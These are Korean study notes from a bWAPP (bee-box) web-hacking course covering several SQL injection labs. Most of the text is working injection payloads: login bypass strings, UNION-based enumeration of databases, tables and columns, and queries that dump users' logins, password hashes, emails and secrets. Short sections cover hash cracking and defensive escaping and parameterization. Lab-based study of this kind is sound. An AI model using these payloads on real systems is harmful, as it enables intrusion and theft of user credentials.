sql
addslash()


-------------------------------------------
15강쯤.mysqli_real_escape_string() 
우회하는 법 찾아볼 

17강쯤. capture 건너뜀


19강. SQL Injection(Login Form&User)
select 에러 내는 법이나 문제를 해결할 방봅을 찾아 볼 것
-------------------------------------------




비박스

ssh 
id  :	bee
pw :	bug

비박스는 
cd /var/www/bWAPP

에서 코드를 확인 할 수 있다. 
파일을 찾아서 함수로 보안코드를 확인하면 된다.

part2 - sql injection 공격



----------------------------------------------------------------------------------------------------------------------------------------------------------
12강. SQL Injection(GET&Search)

 GET 방식 : Header에 정보(변수)를 포함시킴, 그렇기 때문에 주소창(URL)에 서버로 넘어가는 정보가 보임





*1.-----------
공격 가능성 확인 mysqli_real_escape_string() 쓰지 않았다면 (또는 문장에 직접적으로 받았다면)
1.sql문을 거칠 것 같은 폼에 ' 을 입력한다.
2.이런 오류가 났다면 이건 말도 안되게 취약한 웹이다.
3.입력한 값이 바로 sql문으로 입력되는 구조로 '변수'으로 이루어져 있을 것이다.
4.이 경우 # 또는 -- 주석을 이용하여 뒤의 쿼리문을 생략함으로써
  아이디만 알아도 로그인이 가능하다.
  admin'#


1' or 1=1# (주의 언제나 되는건 아니다.)
위 쿼리문으로 모든 내용이 출력된다.


공격 가능성 확인 mysqli_real_escape_string() 썼다면 (또는 문장에 변수로 값을 받았다면)
1 or 1=1#
특수 문자를 쓰지 않는선에서 알아 낼 수 있다.


한가지 꼭 알아야하는 건 1번 방법이 공격 가능 여부를 판단해주는 절대 도구가 아니다
쿼리문이 맞지 않는다면 안될때가 더 많다



*2.-----------
이제 쿼리문의 구조를 알아낼 차례이다.

'union' : 2개 이상의 Select 구문을 실행때 사용함
을 사요와려 컬럼 개수를 파악하여 해당 컬럼에 맞는 sql문을 인젝션하여 정보를 확인할 수 있다

---------------------------------
database() : 데이터베이스 이름
user() : 사용자 아이디
system_user() : 관리자 권한 사용자 아이디
table_name : 테이블 이름
column_name : 컬럼 이름
concat() : 문자열을 합쳐서 출력
@@version : SQL 버전
@@datadir : SQL 서버 디렉토리
---------------------------------

' union select all 1#
' union select all 1,2#
' union select all 1,2,3#
' union select all 1,2,3,4#

이런식으로 해당 된 문장이 작동할때까지 
입력하여 컬럼의 수를 파악한다
' union select all 1,2,3,4,5,6,7#
' union select 1,2,3,4,5,6,7#

위 결과 반응하여 나온것이
2,3,5,4 이다.
이로 인헤 반응한 숫자만이 쿼리문에 의해 출력되는 것이란걸 
알 수 있다.





*3.-----------
이제 데이터 베이스를 알아보자


' union select all 1,database(),user(),system_user(),@@version,6,7#

데이터베이스 이름 , 사용자 아이디 , SQL 버전, 관리자 권한 사용자 아이디
가 출력된다.

1' union select 1,schema_name,3,4,5,6,7 from information_schema.schemata #
이렇게 하면 위 서버의 모든 데이터 베이스가 나온다.







*4.-----------
이제 테이블의 이름을 알아보자
1' union select 1,table_name,3,4,5,6,7 from information_schema.tables #
위 서버의 모든 테이블이 나오게 된다.

위에서 알아낸 정보로 테이블을 간추리자
1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema = 'bWAPP'#




blog	
heroes	
movies	
users	
visitors

이렇게 나오게 되는데






*5.-----------
테이블의 컬럼을 파악하자
1' union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_name = 'users'#

1' union select 1,table_name,column_name,3,4,5,6 from information_schema.columns where table_schema = 'bWAPP' and table_name = 'users'#








*6.-----------
테이블의 컬럼의 내용을 확인하자
간단하게는 이렇게
5' UNION SELECT 1,login,password,email,4,admin,6 FROM bWAPP.users#

정보의 효율을 높이자면
concat() : 문자열을 합쳐서 출력
을 이용하여 쿼리문을 만들면 컬럼의 제한은 해결할 수 있따


5' UNION SELECT all 1,concat(id,login),password,email,secret,6,7 FROM users#

다만 위 경우 html 에 의도되지 않은 정보의 양을 쑤셔넣은 격이라 보기에 불편하다.
페이지 소스보기로 보면 좀 더 가시성을 높여서 정보를 볼수 있다






*7.-----------
패쓰워드의 해시값을 해결하자!
비밀번호는 당연히 해시값으로 되어있다.
이를 해결해야한다.

6885858486f31043e5839c735d99457f045affd0

이게 무슨 로직인지 알수 없다.
그러나 암호학을 모든 개발자가 공부하는게 아니기때문에 오픈소스로 만들었을 확률이 높다.
그러므로
1.칼리리눅스의 hash-identifier을 이용한다
2.알아내고 싶은 해시값을 넣는다

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

예상되는 해시 로직이 나온다
그럼 이걸
이미 각종 사이트를 찾아보면 디코더 사이트가 있다...ㄷㄷㄷ
https://sha1.web-max.ca/index.php#enter

bug라고 찾아준다...

보안코드
function sqli_check_1($data)

{

    return addslashes($data);

            // 작은따옴표를 문자열로 이스케이프 실시

}

 

function sqli_check_2($data)
{


    return mysql_real_escape_string($data);

            // SQL 인젝션에서 사용하는 특수문자에 백슬래시를 붙여 입력값을 이스케이프 실시

               (NULL, \n, \r, \, ', ", ^Z)

}

 
 
 
 여기에 한가지 더 보안을 추가하자면 
 가장 좋은 최종적인 보안은 
 파라미터의 동적 고정을 하는 것으로 
 mysql_real_escape_string() 경우 
 특수 문자가 써지지 않은 경우 우회가 가능하다
  
----------------------------------------------------------------------------------------------------------------------------------------------------------





----------------------------------------------------------------------------------------------------------------------------------------------------------



----------------------------------------------------------------------------------------------------------------------------------------------------------
13강. SQL Injection(GET&Search)

POST 방식 : Body에 정보(변수)를 포함시킴, 그렇기 때문에 주소창(URL)에 서버로 넘어가는 정보가 안보임

post 방식은 패킷을 잡아야함으로 버프스위트같은 툴이 필요하다
보통 post 방식은 body 부분에 있다.
원리와 방식 보안코드는 12강과 같다


----------------------------------------------------------------------------------------------------------------------------------------------------------




----------------------------------------------------------------------------------------------------------------------------------------------------------
14강.SQL Injection(GET/Select)

값을 직접적으로 넣을 수 없는 경우이다 그러나 get 방식은 url에 값을 입력 할 수 있고 
버프스위트도 있다


그럼 위와 같이 진행하면 된다.

*1.-----------
공격 가능성 확인 mysqli_real_escape_string() 쓰지 않았다면 (또는 문장에 직접적으로 받았다면)
1.sql문을 거칠 것 같은 폼에 ' 을 입력한다.
2.이런 오류가 났다면 이건 말도 안되게 취약한 웹이다.
3.입력한 값이 바로 sql문으로 입력되는 구조로 '변수'으로 이루어져 있을 것이다.
4.이 경우 # 또는 -- 주석을 이용하여 뒤의 쿼리문을 생략함으로써
  아이디만 알아도 로그인이 가능하다.
  admin'#


'를 썼는데 오류가 발생했다.
mysqli_real_escape_string() 쓰지 않았다

1' or 1=1# (주의 언제나 되는건 아니다.)
을 입력했는데 되지 않는다
주의하자 1' or 1=1# 은 무적의 공식이 아니다
쿼리문에 맞아야만 불러 올 수 있다
이 경우 쿼리문이 맞지 않다



*2.-----------
이제 쿼리문의 구조를 알아낼 차례이다.


1' union select 1,2,3,4,5,6,7#
주의 할 점이 있다
union은 두 개의 쿼리문을 동시에 불러온다.
여기서 먼저 앞에 있는 쿼리문이 우선순위에 해당하기 때문에 
원래 조건에 맞는 값이 나오는 것들은 피하는게 좋다 쉽게 말해

1' union select 1,2,3,4,5,6,7#
을 넣으면 movie=1 은 원해 있는 것이기 때문에 우선순위에 의해 원래 있는게 나오게 된다
0' union select 1,2,3,4,5,6,7#
페이지를 보면 movie=0은 없으니 0으로 넣어보자

한가지 더 살펴 볼 것이 있다.
0' union select 1,2,3,4,5,6,7#
넣었는데 오류가 발생했다.

보안이 되있는 걸 수도 있지만 받는 값을 변수로 받아서 일 수도 있다.
0 union select 1,2,3,4,5,6,7#




*3.-----------
이제 데이터 베이스를 알아보자


0 union select all 1,database(),user(),system_user(),@@version,6,7#

데이터베이스 이름 , 사용자 아이디 , SQL 버전, 관리자 권한 사용자 아이디
가 출력된다.

0 union select 1,schema_name,3,4,5,6,7 from information_schema.schemata #
이렇게 하면 위 서버의 모든 데이터 베이스가 나와야 하는데 
선택형에서는 이런 문장은 좋지 않다 왜냐면 이 페이지 경우 값이 나오는 틀이 하나로 정해져 있기 때문에
하나만 나오기 전부 나오지 않고 하나만 나오기 때문이다




*4.-----------
이제 테이블의 이름을 알아보자.
0 union select 1,table_name,3,4,5,6,7 from information_schema.tables  #
문제는 여기서는 하나만 나오기때문에 나오는 수가 정해져있기 때문에 다른 방법을 써야 한다

0 union select all 1,database(),user(),system_user(),@@version,6,7#
위에서 쓴 방법이 제일 좋은 듯 

위에서 알아낸 정보로 테이블을 간추리자
0 union select 1,table_name,table_name,4,5,6,7 from information_schema.tables where table_schema = 'bWAPP' limit 1,2#
똑같은 문제가 발생했다 여기서는 하나만 나오기때문에 나오는 수가 정해져있기 때문에 다른 방법을 써야 한다
이는 limit를 이용해서 알아낼 수 있다.
크롤링을 이용하면 쉽게 작업이 편해진다.



*6.-----------
테이블의 컬럼의 내용을 확인하자
간단하게는 이렇게
0 UNION SELECT 1,login,password,email,4,admin,6 FROM bWAPP.users#

정보의 효율을 높이자면
concat() : 문자열을 합쳐서 출력
을 이용하여 쿼리문을 만들면 컬럼의 제한은 해결할 수 있따


0 UNION SELECT all 1,concat(id,login),password,email,secret,6,7 FROM users#

다만 위 경우 html 에 의도되지 않은 정보의 양을 쑤셔넣은 격이라 보기에 불편하다.
페이지 소스보기로 보면 좀 더 가시성을 높여서 정보를 볼수 있다

여기서도 limit를 이용하여 다른 아이디도 알아 낼 수 있다.

0 UNION SELECT all 1,concat(id,login),password,email,secret,6,7 FROM users limit 1,2#
0 UNION SELECT all 1,concat(id,login),password,email,secret,6,7 FROM users limit 2,3#
0 UNION SELECT all 1,concat(id,login),password,email,secret,6,7 FROM users limit 3,4#
0 UNION SELECT all 1,concat(id,login),password,email,secret,6,7 FROM users limit 5,6#


크롤링을 이용하면 쉽게 작업이 편해진다.




----------------------------------------------------------------------------------------------------------------------------------------------------------



----------------------------------------------------------------------------------------------------------------------------------------------------------
15강.SQL Injection(POST&Select)
body 에서 조작한다는 거 말고는 다른게 없음


----------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------
16강.SQL Injection (AJAX/JSON/jQuery)



AJAX(Asynchronous Javascript And XML)
다른 도메인의 서버 URL을 호출하여 데이터를 가져올 수 있는 기능을 수행한다.
사용자와 웹페이지와 자유롭게 상호작용 할 수 있는 기능을 수행한다.
별도의 프로그램 없이 웹페이지를 다시 로딩할 필요 없이 내용, 메뉴 등을 제공한다.
서버 처리를 대기하지 않고, 비동기 요청이 가능하다.

 

JSON(JavaScript Object Notation)
자바스크립트 기반으로 개발됬으며, 여러 프로그래밍 언어에도 사용할 수 있는 독립형 언어
웹 브라우저와 웹 서버 간 비동기 통신, 웹 서버 간의 데이터 교환 등에 주로 사용
Ex) 자바스크립과 PHP 간에 JSON으로 데이터 전달

 

jQuery
HTML의 클라이언트 사이드 조작을 단순화 하도록 설계된 크로스 플랫폼의 자바스크립트 라이브러리



>> 
검색어 자동완성의 기능이 이에 해당한다.


vi sqli_10-1.php

~ 중간 생략 ~

 

   <script>

        $("#title").keyup(function(){
            // Searches for a movie title
            var search = {title: $("#title").val()};

            // AJAX call
            $.getJSON("sqli_10-2.php", search, function(data){    

              // 키값이 입력되면 sqli_10-2.php으로 getJSON 요청을 실시


                init_table();
                // Constructs the table from the JSON data
                var total = 0;
                $.each(data, function(key, val){
                    total++;
                    $("#table_yellow tr:last").after("<tr><td>" + val.title + "</td><td align='center'>" + val.release_year + "</td><td>" + val.main_character + "</td><td align='center'>" + val.genre + "</td><td align='center'><a href='http://www.imdb.com/title/" + val.imdb + "' target='_blank'>Link</a></td></tr>");
                });
                // Empty result
                if (total == 0)
                {
                    $("#table_yellow tr:last").after("<tr height='30'><td colspan='5' width='580'>No movies were found!</td></tr>");
                }
            })

        });




일단 위 3개는 개발을 위해서 보안을 위해서 당연히 공부가 되어야하나
위 문제의 요지는 (AJAX/JSON/jQuery) 에서 sql문으로 값이 전해질 시 그 변수에 보안이 동일하게 되어있어야 한다는 것이다.

보안코드는 전 강의와 보안 코드는 동일하다 



----------------------------------------------------------------------------------------------------------------------------------------------------------------







----------------------------------------------------------------------------------------------------------------------------------------------------------------
17강.SQL Injection(CAPTCHA)
잠깐 보류 dvwa와 같이가기로 함


----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
18강.SQL Injection(Login Form/Hero)
먼저 연산자 우선 순위를 알고 가야한다. 

--------------------------
논리 NOT !
비트 NOT ~
비트 AND &
비트 XOR  ^
비트 OR  |
논리 AND &&
논리 OR  ||
--------------------------
 아래로 갈수록 우선순위가 높다
  
연산자의 우선순위이다
 

 login = 'thor ' or 'a'='a' AND password = ''

                참(1)       거짓(0)    ->      거짓(0)

 

 login = 'thor ' or  거짓

          참(1)      거짓(0)      ->    참(1)   ->  thor ('thor'는 login 컬럼에 있는 정보이기때문에 참으로 처리됨)
  
  
  
 먼저
 보안이 아예 안되있는지 확인하자
 
low
'를 넣으면
오류가 난다

superhero' or 1=1#-- 를 넣으면 비밀번호를 뭐를 넣어도 당연히 뚫린다.

보안이 안되어 있다면 이걸로 다른 아이디로 로그인 할 수 있겠지만
이보다

Welcome Neo, how are you today?

Your secret: Oh Why Didn't I Took That BLACK Pill?

여기를 보자
로그인을 했을때 무언가를 select를 한다면
이는 db를 털수 있다


1.쿼리문의 구조를 알아내자
' union select all 1,2,3,4#
>> 구조 파악 출력되는 곳의 위치 파악


2.데이터 베이스를 알아보자
' union select all 1,@@version,3,database()#
>>db파악


3.테이블의 이름을 알아보자.

' union select all 1,table_name,3,4 from information_schema.tables where table_schema!='information_schema' #
>>비효율적 왜냐면 말그대로 모든 정보를 담고 있는 information_schema 테이블 이외의 모든 테이블을 다 부르는 것이므로

' union select all 1,table_name,3,4 from information_schema.tables where table_schema = 'bWAPP' limit 1,2#
>>특정 테이블이라는 범위를 주고 limit 를 활용하는게 좋다. 파이썬 크롤링 코드를 쓰는게 좋다

다른 방법(비추천)
(' union select 1,table_name,3,4 from information_schema.tables where table_schema='bWAPP' and table_name!='blog'#)
(' union select 1,table_name,3,4 from information_schema.tables where table_schema='bWAPP' and table_name!='blog' and table_name!='heroes' #)
(' union select 1,table_name,3,4 from information_schema.tables where table_schema='bWAPP' and table_name!='blog' and table_name!='heroes' and table_name!='movies'#)

파이썬 크롤링 코드를 짜기에 불편하다




4.테이블의 컬럼의 내용을 확인하자
의심되는 테이블의 컬럼을 확인해보자
' union select all 1,column_name,3,4 from information_schema.columns where table_name='heroes' #
>> id가 나왔다

' union select all 1,column_name,3,4 from information_schema.columns where table_name='heroes' limit 1,2#
>>  Login 이 나왔다

파이썬 코드를 이용해서 크롤링으로 의심되는 컬럼을 찾는다
' union select all 1,id,3,login from heroes #
' union select all 1,id,3,login from heroes limit 1,2#
' union select all 1,id,3,login from heroes limit 2,3#
' union select all 1,id,3,login from heroes limit 3,4#
' union select all 1,id,3,login from heroes limit 4,5#


로그인할 아이디' or 1=1#--



middel,high
보안 코드는 전 강의들과 같다

그런데 dvwa에서도 보았겠지만
mysql_real_escape_string(); 이 함수는 값을 변수로 받을 경우 특수 문자없이 쿼리문을 만들 수 있어 우회가 가능하며
쓰레기 값을 주어서 기능을 마비시킬 수 있으므로 파라미터 제한을 거는 것이 제일 좋은 방법이다.



----------------------------------------------------------------------------------------------------------------------------------------------------------------








----------------------------------------------------------------------------------------------------------------------------------------------------------------
19강. SQL Injection(Login Form&User)




        $login = $_POST["login"];
        $login = sqli($login);
        $password = $_POST["password"];
        $password = sqli($password);
        $password = hash("sha1", $password, false);

        $sql = "SELECT * FROM users WHERE login = '" . $login . "'";
//아이디 값을 먼저 확인을하고
//아이디가 없다면??? 실행을 멈춘다
  
        $recordset = mysql_query($sql, $link);
        if(!$recordset)
        {
            die("Error: " . mysql_error());
        }
        else
        {

//확인이되면 그 이후에 비밀번호가 맞는지 확인하는 방식인데
// ' or 1=1# 이 아이디를 모르면 작동되지 않도록 막아놓은 것이다
// 아이디를 안다고 해도 비밀번호를 무력화 시킬 수 없고 결국 비밀번호를 확인을 하게되기 때문에 비밀번호를 모르면 알아낼 수 가 없다.
// 뿐만 아니라 '" . $login . "'"; 로 쿼리문을 만들때 하나의 문장을 못 끝내도록 구조가 되어 있다
// ...라고 생각하기 쉽지만 뚫린다


            $row = mysql_fetch_array($recordset);
            if($row["login"] && $password == $row["password"])  // Login&Password가 일치하면 힌트 출력 실시
            {
 
                $message =  "<p>Welcome <b>" . ucwords($row["login"]) . "</b>, how are you today?</p><p>Your secret: <b>" . ucwords($row["secret"]) . "</b></p>";
             
            }

// 단 하나의 쿼리문이 보안이 안되있으면 무수히 많은 방식으로 활용이 가능하기 때문이다
// dvwa-blind 방식과 동일한데 참고로 아이디 중 하나는 bee 이다 
// 비밀번호가 틀려도 위의 쿼리문이 참이라면 Invalid credentials! 뜰 것이고 
// 쿼리문이 말이 안되면 애러가 날것이다

그럼 그게 어떻게 가능할 걸까????
먼저
bee' or 1=1# 이라고 입력해보자 Invalid credentials! 뜬다 쿼리문이 말이 된다는 것이다야한다. 
쿼리문이 말이 안된다면 오류가 뜰것이다

이를 이용하여 파고든다 
1.쿼리문의 구조를 알아내자
오류가 뜨지 않는다면 true 처리 되었다는 애기이다
' union select all 1#                           F  
' union select all 1,2#                         F   
' union select all 1,2,3#                       F
' union select all 1,2,3,4#                     F 
' union select all 1,2,3,4,5#                   F    
' union select all 1,2,3,4,5,6#                 F         
' union select all 1,2,3,4,5,6,7#               F          
' union select all 1,2,3,4,5,6,7,8#             F           
' union select all 1,2,3,4,5,6,7,8,9#           T 

코더가 자존심이 있지 일일이 노동하지 말고
파이썬 크롤링 쓰자...



2.데이터 베이스를 알아보자.....그러나..??? 어떻게????
직접적으로는 알 수 없으나 한글자씩 맞추어가면 결국은 가능하다

' union select all 1,@@version,3,database(),5,6,7,8,9#

MySQL에서는 데이터베이스 구조(메타데이타 또는 스키마)를 정보스키마(information_schema)에 저장한다

ex)
Database: information_schema
Table: tables
[53 entries]
+--------------------+--------------------------------------+-------------+--------+----------+
| table_schema       | table_name                           | table_type  | engine |table_rows|
+--------------------+--------------------------------------+-------------+--------+----------+
| mysql              | slow_log                             | BASE TABLE  | CSV    | 2        |
| mysql              | general_log                          | BASE TABLE  | CSV    | 2        |
| information_schema | KEY_COLUMN_USAGE                     | SYSTEM VIEW | MEMORY | NULL     |
| information_schema | SCHEMATA                             | SYSTEM VIEW | MEMORY | NULL     |
| information_schema | TABLE_PRIVILEGES                     | SYSTEM VIEW | MEMORY | NULL     |
+--------------------+--------------------------------------+-------------+--------+----------+

대략 이런 구조이다
여기서 
생성된 모든 데이터베이스 이름은 table_schema 컬럼에 저장되어 있다

그래서 
SELECT table_schema FROM information_schema.columns;
이렇게 적으면 모든 db명이 나오는 이유이다

보통은 
중복되어 조회될 수 있으므로 DISTINCT를 선언하여 SELECT문의 조회 결과에서 중복을 모두 제거한다.
SELECT DISTINCT table_schema FROM information_schema.columns

DBMS의 정보스키마 이름이 information_schema임을 알고 있으므로 이를 제거한다. SQL 표준에서 "같지않다"는 "<>"이지만 대부분의 DBMS가 비표준인 "!="를 지원하므로 이를 사용하였다.
SELECT DISTINCT table_schema FROM information_schema.columns WHERE table_schema!='information_schema';

이렇게 남은 db명은 사용자가 생성한 모든 db명들이다

원리는 이렇다 
첫번째 컬럼의 첫글짜는 x일 것이다 두번쨰 글짜는 x일 것이다 n번째 글짜가 없으므로 n-1 수의 db명을 유추한다.
두번째 컬럼의 첫글짜는 x일 것이다 두번쨰 글짜는 x일 것이다 n번째 글짜가 없으므로 n-1 수의 db명을 유추한다.
....
n번째  컬럼의 첫글짜는 x일 것이다 두번쨰 글짜는 x일 것이다 n번째 글짜가 없으므로 n-1 수의 db명을 유추한다.

이러면 나올 수 밖에 없다
당연히 실행해야 할 양이 양인 만큼 크롤링으로 해야한다.
위 원리가 sqlmap의 원리이다.

원리를 따라 가보자
첫번쨰 컬럼의
SELECT DISTINCT table_schema FROM information_schema.columns WHERE table_schema!='information_schema' LIMIT 0,1;

첫번째 컬럼의 첫글짜는 x일 것이다 두번쨰 글짜는 'a'일 것이다
substr( (SELECT DISTINCT table_schema FROM information_schema.columns WHERE table_schema!='information_schema' LIMIT 0,1),1,1) = 'a';

문제에 맞게 변형시켜보자

' union select 1,2,3,4,5,6,7,8,substr( (SELECT DISTINCT table_schema FROM information_schema.columns WHERE table_schema!='information_schema' LIMIT 0,1),1,1) = 'a';#

그런데 여기서 막히게 된다 
핵심 원리인 
애러냐 Invalid credentials!냐 인데

첨부 Invalid credentials! 처리로 들어가서 원하는 답이 안나올시 애러를 내야한다

sql 문의 조건문을 이용한다
ex)--------------------------------------------
SELECT num,
CASE WHEN num = '3' THEN 'desc board' ELSE '남' END 
FROM board limit 0,1;
-----------------------------------------------





일단 여기 부분은 sql 구문의 지식을 좀 더 요구 하는 거 같다. 일단 넘어가고 시간이 날때 나중에 찾아보자





보안코드는 위의 강의와 동일하다
----------------------------------------------------------------------------------------------------------------------------------------------------------------







----------------------------------------------------------------------------------------------------------------------------------------------------------------
20강.Injection - SQL Injection(SQLite)


데이터베이스 관리 시스템이지만, 서버가 아니라 응용 프로그램으로 동작하는 비교적 가벼운 데이터베이스
API는 단순히 라이브러리를 호출하는 것만 있으며, 데이터를 저장하는 데 하나의 파일만을 사용함

SQLite에서는 -- 를 이용하여 주석 처리

' or 1=1--
동일한 원리로 모든 쿼리가 다 나온다




전체적인 뤈리와 과정은 똑같다.


1.쿼리문 구조를 파악한다
0' union select all 1--
0' union select all 1,2--
0' union select all 1,2,3--
0' union select all 1,2,3,4--
0' union select all 1,2,3,4,5--
0' union select all 1,2,3,4,5,6--

파이썬 코드써서 크롤링하는게 편하다



2.데이터 베이스를 알아보자.....그러나..sqlite는 구조가 좀 다르다
0' union select all 1,sqlite_version(),3,4,5,6 --


3.테이블의 이름을 알아보자.
0' union select all 1,tbl_name,3,4,5,6 from sqlite_master --

4.의심되는 테이블의 컬럼의 내용(필드)을 확인하자
0' union select all 1,sql,3,4,5,6 from sqlite_master where tbl_name='users' --필

5.알아낼 내용을 뽑아내자 
0' union select all 1,id,login,password,email,6 from users limit  --




핵심은 구조(sqlite) 와 문법(mongoDB) 이 다르더라도 전체적인 원리는 같다는 저미다


보안 코드는 특수문자 '를 못쓰게 만드는 것이다.

그러나 알다싶이 이는 좋은 보안이 아니다.
pdo를 사용하여 파라미터를 고정시키는것이 가장 좋은 방법이다


----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
21강.SQL Injection(Drupageddon)

PHP로 작성된 오픈 소스 콘텐츠 관리 프레임워크, 콘텐츠 관리 시스템, 블로그 엔진이다. 처음에는 게시판으로
만들었으나 여러 가지 유용한 기능을 추가하여 현재의 모습을 가지게 되었다.
7.32 이전의 Drupal 코어 7.x의 데이터베이스 추상화 API에있는 expandArguments 함수는 준비된 문을 올바르게
구성하지 않아 원격 공격자가 만들어진 키가있는 배열을 통해 SQL 인젝션 공격이 가능하다.



https://www.youtube.com/watch?v=NLzOoSxSSyE&list=PLnfbQ9q1E7JRqsH-uXheybpis781gABhN&index=19

오픈소스의 위험을 알려주는 내용이다
유면항 오픈소스 일수록 취약점은 나오기 마련이다.
Drupal 은 그 취약점을 모아논 사이트이고 
어떤 오픈소스를 갖다가 썼는지 알 수만 있다면 간단하게 
php 기준 Drupal의 공격 코드를 다운받아 간단하게 취약점으로 부터 
아이디나 패쓰워드등 정보를 가져올 수 있다





----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
22강.SQL Injection - Stored(Blog)




1) Reflected 방식
공격자가 태그/스크립트를 삽입한 URL을 클라이언트가 사용했을 경우, 서버로 HTTP 요청을 보내고 응답 받을시
태그/스크립트가 클라이언트에서 실행되는 방식
그렇기 때문에 클라이언트는 실제 웹 싸이트 접근이 아닌 피싱 사이트로 접속되는 문제가 발생할 수 있다.
공격자가 악의적인 URL을 유포하는 방법 : 이메일, 게시판에 URL 링크 정보 노출, SNS를 통해서 URL 링크 정보 노출
Ex) URL 클릭시 : 피싱 사이트 접속 이후 개인 정보 유출, 바탕화면에 쓸때 없는 아이콘 생성 및 불필요한 프로그램 설치

 
2) Stored 방식
공격자가 서버(게시판)에 태그/스크립트를 저장시켜, 클라이언트가 게시판을 읽을 경우 태그/스크립트가 실행되는 방식
Ex) 게시판을 읽을 경우 : 쿠기 정보 갈취, 악성 코드 유입, 랜섬웨어, 피싱 사이트 접속, 불필요한 프로그램 설치



이는 dvwa에서 다뤘으므로 간단히 하고 넘어간다

보안코드는
addslashes();
mysql_real_escape_string();
pdo 파라미터 처리
이다

사이트를 조작해서 함정을 파놓고 다른사용자가 누르게끔 유도하는 피싱은 
dvwa 에서 하였고
stored 에서도 정보를 뽑아 낼 수있는데

그런데 그전에 쿼리문의 이해가 좀 필요하다
게시판에 글을 쓴다면
쿼리문의 구조는 
insert 테이블 values 값 ;
의 형태일 것이다
문제는 어디에 들어사는 것인지를 알아야한다


0.sql 인젝션이 되는지와 구조를 파악한다

'을 입력해서 게시판을 작성하낟 오류가 나면
그 오류를 보자 
--error-------------------------------------------------
 the right syntax to use near 'bee')' at line 2
--------------------------------------------------------
 
$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(), '$entry' ,  '$owner' )";

이런 구조일 것이다
$entry 에 들어가는 구조 일 것이다

위 경우 이런식으로 조작한다
$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(), ' ', (select @@version))#  ,  '$owner' )";
$entry '                 으로 빈칸으로 해결
(select @@version))#     ()하면 구문을 집어 넣을 수 있음 ) 한번 더 써서 문장3개의 values 값 맞춰주고 #주석으로 문장끝내기 

여기서 부터는 원리는 위와 같다


1.데이터 베이스를 알아보자
위 경우 바로 db를 알아낼 수 있다
' , (select @@version))#

2.테이블의 이름을 알아보자.
',(select table_name from information_schema.tables)) #
Error: Subquery returns more than 1 row
SQL 인젝션 실시 -> 결과값이 1줄씩 출력되기 때문에 오류 메세지 출력
',(select table_name from information_schema.tables limit 0,1)) #
',(select table_name from information_schema.tables where table_schema!='information_schema' limit 0,1)) #
겹치는 거 제외
',(select table_name from information_schema.tables where table_schema!='information_schema' limit 1,1)) #
',(select table_name from information_schema.tables where table_schema!='information_schema' limit 2,1)) #
',(select table_name from information_schema.tables where table_schema!='information_schema' limit 3,1)) #




3.테이블의 컬럼의 내용을 확인하자

',(select column_name from information_schema.columns where table_name='users' limit 0,1)) #
',(select column_name from information_schema.columns where table_name='users' limit 1,1)) #
',(select column_name from information_schema.columns where table_name='users' limit 2,1)) #





4. 필요한 정보를 빼보자
',(select concat(id,login,password) from users limit 0,1)) #
',(select concat(id,login,password) from users limit 1,1)) #

----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
23강.SQL Injection - Stored(SQLite)

문법과 구조가 다를 뿐 원리는 비슷하다

데이터베이스 관리 시스템이지만, 서버가 아니라 응용 프로그램으로 동작하는 비교적 가벼운 데이터베이스
API는 단순히 라이브러리를 호출하는 것만 있으며, 데이터를 저장하는 데 하나의 파일만을 사용함
Beebox SQLite 삽입 구문 : insert into 게시판 테이블 이름(글 번호, '날짜', '내용', '게시자')
Ex) SQLite 버젼 확인 인젝션

$sql = "INSERT INTO blog (id, date, entry, owner) VALUES (" ++$id ", "date('Y-m-d', time())" , "$entry" , "$owner");";


',(select sqlite_version())) --
입력

$sql = "INSERT INTO blog (id, date, entry, owner) VALUES (" ++$id ", "date('Y-m-d', time())" , "',(select sqlite_version())) -- , "$owner");";



$entry '                 으로 빈칸으로 해결
(select @@version))--     ()하면 구문을 집어 넣을 수 있음 ) 한번 더 써서 문장3개의 values 값 맞춰주고 --주석으로 문장끝내기 


0.인젝션에 취약한지 파악

'(작은 따옴표)를 입력하여 취약점이 있는지 확인 실시
(오류 메세지는 안나오지만, 작은따옴표가 입력되지 않았기 때문에 이스케이프가 안된 상태)
'(작은 따옴표) 2개를 입력하여, '(작은 따옴표) 이스케이프 유무 확인 


1.데이터 베이스를 알아보자
',(select sqlite_version())) --



2.테이블의 이름을 알아보자.
',(select tbl_name from sqlite_master limit 1,1))--
',(select tbl_name from sqlite_master limit 2,1))--
',(select tbl_name from sqlite_master limit 3,1))--
',(select tbl_name from sqlite_master limit 4,1))--
',(select tbl_name from sqlite_master limit 5,1))--
',(select tbl_name from sqlite_master limit 6,1))--


3.테이블의 컬럼의 내용을 확인하자
',(select sql from sqlite_master where tbl_name='users'))--



4. 필요한 정보를 빼보자
',(select id from users limit 0,1))--
',(select login from users limit 0,1))--
',(select password from users limit 0,1))--


',(select id from users limit 1,1))--
',(select login from users limit 1,1))--
',(select password from users limit 1,1))--


파이썬 크롤링을 활용하자

보안코드는
addslashes();
mysql_real_escape_string();
pdo 파라미터 처리
이다
----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
24강.SQL Injection - Stored(User-Agent)



User-Agent
HTTP 요청시 헤더에 포함되는 클라이언트 OS 버전 및 아키텍처, 웹 브라우저 정보


요점은 간단하다 User-Agent 같은 요청 정보 나 기타 정보등을 호출할때도 호출 변수에 보안이 되어 있어야 한다.
직접 페이지에서는 값을 조작할 수 없지만 버프스위트나 프로그램 코드로 패킷을 조작할 수 있기 때문이다




23강과 과정이 똑같다-----------------------------
0.인젝션에 취약한지 파악
1.데이터 베이스를 알아보자
2.테이블의 이름을 알아보자.
3.테이블의 컬럼의 내용을 확인하자
4.필요한 정보를 빼보자
------------------------------------------------


보안코드는
addslashes();
mysql_real_escape_string();
pdo 파라미터 처리
이다
----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
25강.




